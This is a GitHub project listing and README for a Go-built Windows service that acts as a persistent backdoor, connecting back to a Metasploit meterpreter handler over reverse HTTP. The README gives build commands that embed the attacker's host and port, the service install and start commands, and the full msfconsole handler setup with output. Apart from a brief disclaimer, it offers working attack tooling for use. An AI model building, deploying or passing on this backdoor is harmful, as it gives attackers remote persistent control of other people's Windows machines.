https://github.com/mauri870/powershell-reverse-http
:innocent: A Powershell exploit service that opens a reverse http connection via meterpreter
https://github.com/mauri870/powershell-reverse-http
metasploit-framework meterpreter service windows
Last synced: 9 months ago
JSON representation
:innocent: A Powershell exploit service that opens a reverse http connection via meterpreter
- Host: GitHub
- URL: https://github.com/mauri870/powershell-reverse-http
- Owner: mauri870
- Created: 2016-08-17T13:28:34.000Z (over 9 years ago)
- Default Branch: master
- Last Pushed: 2023-02-25T07:22:10.000Z (almost 3 years ago)
- Last Synced: 2023-11-07T17:14:56.121Z (about 2 years ago)
- Topics: metasploit-framework, meterpreter, service, windows
- Language: Go
- Homepage:
- Size: 9.77 KB
- Stars: 116
- Watchers: 13
- Forks: 50
- Open Issues: 5
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Powershell Reverse Http
> Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization
> Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.
A simple windows service running on background that connects with a meterpreter session via http.
### Usage
First, you need [go](https://golang.org/dl/) for build the binary (duh!) and [metasploit-framework](https://github.com/rapid7/metasploit-framework) to accept the reverse connection:
```
git clone https://github.com/mauri870/powershell-reverse-http.git
cd powershell-reverse-http
env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe
```
Change the LPORT and LHOST to match your metasploit handler
## Usage
```
powershell-reverse.exe
no command specified
usage: powershell-reverse.exe
where is one of
install, remove, debug, start, stop, restart, pause or continue.
```
After install and start, the service is always up and trying to connect on host and port specified on `exploit.go`
On the attacker's machine:
```
./msfconsole --quiet
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST YOUR_IP_ADDRESS_HERE
LHOST => YOUR_IP_ADDRESS_HERE
msf exploit(handler) > set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE
LPORT => YOUR_PORT_TO_AWAIT_CONNECTION_HERE
msf exploit(handler) > exploit
[*] Started HTTP reverse handler on http://LHOST:LPORT
[*] Starting the payload handler...
```